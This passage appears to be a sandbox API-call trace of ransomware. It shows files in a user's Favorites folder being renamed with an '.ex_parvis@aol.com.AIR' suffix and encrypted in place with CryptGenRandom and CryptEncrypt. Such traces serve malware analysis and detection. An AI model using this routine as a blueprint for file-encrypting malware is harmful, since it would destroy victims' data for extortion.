HALPmcxz\\Favorites\\Links\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\desktop.ini.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0167.448] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\desktop.ini.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54c [0167.448] GetProcessHeap () returned 0x2e0000 [0167.449] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3a7428 | out: hHeap=0x2e0000) returned 1 [0167.449] GetFileSizeEx (in: hFile=0x54c, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=80) returned 1 [0167.449] SetFilePointer (in: hFile=0x54c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x50 [0167.449] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0167.449] GetProcessHeap () returned 0x2e0000 [0167.449] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0167.449] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0167.449] WriteFile (in: hFile=0x54c, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0167.450] WriteFile (in: hFile=0x54c, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0167.450] WriteFile (in: hFile=0x54c, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0167.450] ReadFile (in: hFile=0x54c, lpBuffer=0x3609c8, nNumberOfBytesToRead=0x50, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3609c8*, lpNumberOfBytesRead=0x2acf9c8*=0x50, lpOverlapped=0x0) returned 1 [0167.450] SetFilePointer (in: hFile=0x54c, lDistanceToMove=-80, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.450] WriteFile (in: hFile=0x54c, lpBuffer=0x360970*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x360970*, lpNumberOfBytesWritten=0x2acf9c8*=0x50, lpOverlapped=0x0) returned 1 [0167.451] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb163f970, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0xb163f970, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3b1928 [0167.451] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0167.451] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0167.451] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url", dwFileAttributes=0x80) returned 1 [0167.452] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url") returned 79 [0167.452] GetProcessHeap () returned 0x2e0000 [0167.452] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x104) returned 0x336dd8 [0167.452] lstrcpyW (in: lpString1=0x336dd8, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url" [0167.452] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url.12781717671972518758.ex_parvis@aol.com.AIR" [0167.452] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft store.url"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft store.url.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0167.455] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft store.url.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x550 [0167.455] GetProcessHeap () returned 0x2e0000 [0167.455] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x336dd8 | out: hHeap=0x2e0000) returned 1 [0167.455] GetFileSizeEx (in: hFile=0x550, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=134) returned 1 [0167.455] SetFilePointer (in: hFile=0x550, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x86 [0167.455] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0167.455] GetProcessHeap () returned 0x2e0000 [0167.455] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0167.455] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0167.455] WriteFile (in: hFile=0x550, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0167.457] WriteFile (in: hFile=0x550, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0167.457] WriteFile (in: hFile=0x550, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0167.457] ReadFile (in: hFile=0x550, lpBuffer=0x312a78, nNumberOfBytesToRead=0x86, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x312a78*, lpNumberOfBytesRead=0x2acf9c8*=0x86, lpOverlapped=0x0) returned 1 [0167.457] SetFilePointer (in: hFile=0x550, lDistanceToMove=-134, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.457] WriteFile (in: hFile=0x550, lpBuffer=0x336dd8*, nNumberOfBytesToWrite=0x86, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x336dd8*, lpNumberOfBytesWritten=0x2acf9c8*=0x86, lpOverlapped=0x0) returned 1 [0167.457] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0167.457] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0167.457] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url", dwFileAttributes=0x80) returned 1 [0167.458] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url") returned 81 [0167.458] GetProcessHeap () returned 0x2e0000 [0167.458] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x108) returned 0x336dd8 [0167.458] lstrcpyW (in: lpString1=0x336dd8, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url" [0167.458] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url.12781717671972518758.ex_parvis@aol.com.AIR" [0167.458] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at work.url"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at work.url.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0167.461] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at work.url.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x550 [0167.461] GetProcessHeap () returned 0x2e0000 [0167.461] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x336dd8 | out: hHeap=0x2e0000) returned 1 [0167.461] GetFileSizeEx (in: hFile=0x550, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=133) returned 1 [0167.461] SetFilePointer (in: hFile=0x550, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x85 [0167.461] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0167.461] GetProcessHeap () returned 0x2e0000 [0167.461] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0167.461] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0167.461] WriteFile (in: hFile=0x550, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0167.462] WriteFile (in: hFile=0x550, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0167.463] WriteFile (in: hFile=0x550, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0167.463] ReadFile (in: hFile=0x550, lpBuffer=0x312a78, nNumberOfBytesToRead=0x85, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x312a78*, lpNumberOfBytesRead=0x2acf9c8*=0x85, lpOverlapped=0x0) returned 1 [0167.463] SetFilePointer (in: hFile=0x550, lDistanceToMove=-133, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.463] WriteFile (in: hFile=0x550, lpBuffer=0x336dd8*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x336dd8*, lpNumberOfBytesWritten=0x2acf9c8*=0x85, lpOverlapped=0x0) returned 1 [0167.463] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0167.463] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0167.463] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url", dwFileAttributes=0x80) returned 1 [0167.463] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url") returned 81 [0167.463] GetProcessHeap () returned 0x2e0000 [0167.463] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x108) returned 0x336dd8 [0167.463] lstrcpyW (in: lpString1=0x336dd8, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url" [0167.463] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url.12781717671972518758.ex_parvis@aol.com.AIR" [0167.463] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at home.url"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at home.url.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0167.466] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at home.url.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x550 [0167.467] GetProcessHeap () returned 0x2e0000 [0167.467] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x336dd8 | out: hHeap=0x2e0000) returned 1 [0167.467] GetFileSizeEx (in: hFile=0x550, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=133) returned 1 [0167.467] SetFilePointer (in: hFile=0x550, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x85 [0167.467] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0167.467] GetProcessHeap () returned 0x2e0000 [0167.467] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0167.467] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0167.467] WriteFile (in: hFile=0x550, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0167.468] WriteFile (in: hFile=0x550, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0167.468] WriteFile (in: hFile=0x550, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0167.468] ReadFile (in: hFile=0x550, lpBuffer=0x312a78, nNumberOfBytesToRead=0x85, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x312a78*, lpNumberOfBytesRead=0x2acf9c8*=0x85, lpOverlapped=0x0) returned 1 [0167.468] SetFilePointer (in: hFile=0x550, lDistanceToMove=-133, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.468] WriteFile (in: hFile=0x550, lpBuffer=0x336dd8*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x336dd8*, lpNumberOfBytesWritten=0x2acf9c8*=0x85, lpOverlapped=0x0) returned 1 [0167.469] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0167.469] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0167.469] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url", dwFileAttributes=0x80) returned 1 [0167.469] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url") returned 88 [0167.469] GetProcessHeap () returned 0x2e0000 [0167.469] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x116) returned 0x31fae0 [0167.469] lstrcpyW (in: lpString1=0x31fae0, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url" [0167.469] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url.12781717671972518758.ex_parvis@aol.com.AIR" [0167.469] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie site on microsoft.com.url"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie site on microsoft.com.url.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0167.472] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie site on microsoft.com.url.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x550 [0167.472] GetProcessHeap () returned 0x2e0000 [0167.472] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x31fae0 | out: hHeap=0x2e0000) returned 1 [0167.472] GetFileSizeEx (in: hFile=0x550, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=133) returned 1 [0167.472] SetFilePointer (in: hFile=0x550, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x85 [0167.472] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0167.472] GetProcessHeap () returned 0x2e0000 [0167.472] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0167.472] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0167.472] WriteFile (in: hFile=0x550, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0167.473] WriteFile (in: hFile=0x550, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0167.474] WriteFile (in: hFile=0x550, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0167.474] ReadFile (in: hFile=0x550, lpBuffer=0x312a78, nNumberOfBytesToRead=0x85, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x312a78*, lpNumberOfBytesRead=0x2acf9c8*=0x85, lpOverlapped=0x0) returned 1 [0167.474] SetFilePointer (in: hFile=0x550, lDistanceToMove=-133, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.474] WriteFile (in: hFile=0x550, lpBuffer=0x31fae0*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x31fae0*, lpNumberOfBytesWritten=0x2acf9c8*=0x85, lpOverlapped=0x0) returned 1 [0167.474] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0167.474] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0167.474] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url", dwFileAttributes=0x80) returned 1 [0167.474] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url") returned 78 [0167.474] GetProcessHeap () returned 0x2e0000 [0167.474] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x102) returned 0x336dd8 [0167.474] lstrcpyW (in: lpString1=0x336dd8, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url" [0167.474] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url.12781717671972518758.ex_parvis@aol.com.AIR" [0167.475] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url" (normalized: "c:\\users\\5p5nrgjn0js 